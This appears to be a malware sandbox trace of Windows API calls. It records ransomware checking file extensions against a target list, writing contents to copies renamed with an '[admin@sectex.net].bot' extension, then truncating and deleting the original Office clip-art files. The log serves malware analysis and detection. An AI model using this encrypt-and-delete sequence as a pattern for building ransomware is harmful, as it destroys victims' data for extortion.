	[0058.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.534] lstrlenW (lpString=".jpg") returned 4
	[0058.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.535] lstrlenW (lpString=".doc") returned 4
	[0058.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString=".docx") returned 5
	[0058.535] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.535] lstrlenW (lpString=".pdf") returned 4
	[0058.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString=".xls") returned 4
	[0058.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.535] lstrlenW (lpString=".xlsx") returned 5
	[0058.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.535] lstrlenW (lpString=".ppt") returned 4
	[0058.535] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.535] lstrlenW (lpString=".zip") returned 4
	[0058.535] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.535] lstrlenW (lpString=".rar") returned 4
	[0058.535] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString=".bz2") returned 4
	[0058.535] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString=".7z") returned 3
	[0058.535] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.535] lstrlenW (lpString=".dbf") returned 4
	[0058.535] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.535] lstrlenW (lpString=".1cd") returned 4
	[0058.535] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63
	[0058.535] lstrlenW (lpString=".jpg") returned 4
	[0058.535] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.536] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.536] lstrlenW (lpString="AN01044_.WMF") returned 12
	[0058.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.536] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1596) returned 1
	[0058.536] CloseHandle (hObject=0x20c) returned 1
	[0058.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 0x20
	[0058.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.536] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.536] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.537] GetLastError () returned 0x0
	[0058.537] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x63c, lpOverlapped=0x0) returned 1
	[0058.545] WriteFile (in: hFile=0x230, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x640, lpOverlapped=0x0) returned 1
	[0058.546] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.546] WriteFile (in: hFile=0x230, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.546] SetEndOfFile (hFile=0x230) returned 1
	[0058.546] CloseHandle (hObject=0x230) returned 1
	[0058.547] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.547] SetEndOfFile (hFile=0x20c) returned 1
	[0058.547] CloseHandle (hObject=0x20c) returned 1
	[0058.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.548] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 1
	[0058.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.891] lstrlenW (lpString=".doc") returned 4
	[0058.891] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.891] lstrlenW (lpString=".docx") returned 5
	[0058.891] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.891] lstrlenW (lpString=".pdf") returned 4
	[0058.891] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.898] lstrlenW (lpString=".xls") returned 4
	[0058.904] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.907] lstrlenW (lpString=".xlsx") returned 5
	[0058.907] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.912] lstrlenW (lpString=".ppt") returned 4
	[0058.912] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.912] lstrlenW (lpString=".zip") returned 4
	[0058.912] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.912] lstrlenW (lpString=".rar") returned 4
	[0058.912] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.912] lstrlenW (lpString=".bz2") returned 4
	[0058.912] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.912] lstrlenW (lpString=".7z") returned 3
	[0058.912] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.912] lstrlenW (lpString=".dbf") returned 4
	[0058.912] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString=".1cd") returned 4
	[0058.913] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString=".jpg") returned 4
	[0058.913] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString=".doc") returned 4
	[0058.913] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString=".docx") returned 5
	[0058.913] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.913] lstrlenW (lpString=".pdf") returned 4
	[0058.913] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString=".xls") returned 4
	[0058.913] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.913] lstrlenW (lpString=".xlsx") returned 5
	[0058.913] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.913] lstrlenW (lpString=".ppt") returned 4
	[0058.913] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString=".zip") returned 4
	[0058.913] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.913] lstrlenW (lpString=".rar") returned 4
	[0058.913] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString=".bz2") returned 4
	[0058.913] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString=".7z") returned 3
	[0058.913] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString=".dbf") returned 4
	[0058.913] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.913] lstrlenW (lpString=".1cd") returned 4
	[0058.913] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63
	[0058.914] lstrlenW (lpString=".jpg") returned 4
	[0058.914] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.914] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.914] lstrlenW (lpString="AN02724_.WMF") returned 12
	[0058.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.207] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2108) returned 1
	[0059.207] CloseHandle (hObject=0x15c) returned 1
	[0059.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 0x20
	[0059.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.207] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.207] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160
	[0059.207] GetLastError () returned 0x0
	[0059.207] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x83c, lpOverlapped=0x0) returned 1
	[0059.209] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x840, lpOverlapped=0x0) returned 1
	[0059.210] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.210] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.210] SetEndOfFile (hFile=0x160) returned 1
	[0059.210] CloseHandle (hObject=0x160) returned 1
	[0059.210] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.211] SetEndOfFile (hFile=0x15c) returned 1
	[0059.211] CloseHandle (hObject=0x15c) returned 1
	[0059.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.212] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 1
	[0059.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.212] lstrlenW (lpString=".doc") returned 4
	[0059.212] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString=".docx") returned 5
	[0059.212] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.212] lstrlenW (lpString=".pdf") returned 4
	[0059.212] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString=".xls") returned 4
	[0059.212] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.212] lstrlenW (lpString=".xlsx") returned 5
	[0059.212] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.212] lstrlenW (lpString=".ppt") returned 4
	[0059.212] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.212] lstrlenW (lpString=".zip") returned 4
	[0059.212] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.212] lstrlenW (lpString=".rar") returned 4
	[0059.212] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString=".bz2") returned 4
	[0059.212] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString=".7z") returned 3
	[0059.212] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.212] lstrlenW (lpString=".dbf") returned 4
	[0059.212] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.212] lstrlenW (lpString=".1cd") returned 4
	[0059.212] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString=".jpg") returned 4
	[0059.213] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString=".doc") returned 4
	[0059.213] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString=".docx") returned 5
	[0059.213] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.213] lstrlenW (lpString=".pdf") returned 4
	[0059.213] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString=".xls") returned 4
	[0059.213] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.213] lstrlenW (lpString=".xlsx") returned 5
	[0059.213] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.213] lstrlenW (lpString=".ppt") returned 4
	[0059.213] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString=".zip") returned 4
	[0059.213] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.213] lstrlenW (lpString=".rar") returned 4
	[0059.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString=".bz2") returned 4
	[0059.213] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString=".7z") returned 3
	[0059.213] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString=".dbf") returned 4
	[0059.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString=".1cd") returned 4
	[0059.213] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63
	[0059.213] lstrlenW (lpString=".jpg") returned 4
	[0059.213] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.214] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.214] lstrlenW (lpString="AN04108_.WMF") returned 12
	[0059.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.214] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2344) returned 1
	[0059.214] CloseHandle (hObject=0x15c) returned 1
	[0059.214] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 0x20
	[0059.214] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.214] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.214] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160
	[0059.215] GetLastError () returned 0x0
	[0059.215] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x928, lpOverlapped=0x0) returned 1
	[0059.216] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x930, lpOverlapped=0x0) returned 1
	[0059.217] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.217] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.217] SetEndOfFile (hFile=0x160) returned 1
	[0059.217] CloseHandle (hObject=0x160) returned 1
	[0059.217] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.217] SetEndOfFile (hFile=0x15c) returned 1
	[0059.218] CloseHandle (hObject=0x15c) returned 1
	[0059.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.218] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 1
	[0059.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.219] lstrlenW (lpString=".doc") returned 4
	[0059.219] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString=".docx") returned 5
	[0059.219] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.219] lstrlenW (lpString=".pdf") returned 4
	[0059.219] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString=".xls") returned 4
	[0059.219] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.219] lstrlenW (lpString=".xlsx") returned 5
	[0059.219] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.219] lstrlenW (lpString=".ppt") returned 4
	[0059.219] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.219] lstrlenW (lpString=".zip") returned 4
	[0059.219] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.219] lstrlenW (lpString=".rar") returned 4
	[0059.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString=".bz2") returned 4
	[0059.219] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString=".7z") returned 3
	[0059.219] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.219] lstrlenW (lpString=".dbf") returned 4
	[0059.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.219] lstrlenW (lpString=".1cd") returned 4
	[0059.219] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.219] lstrlenW (lpString=".jpg") returned 4
	[0059.219] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
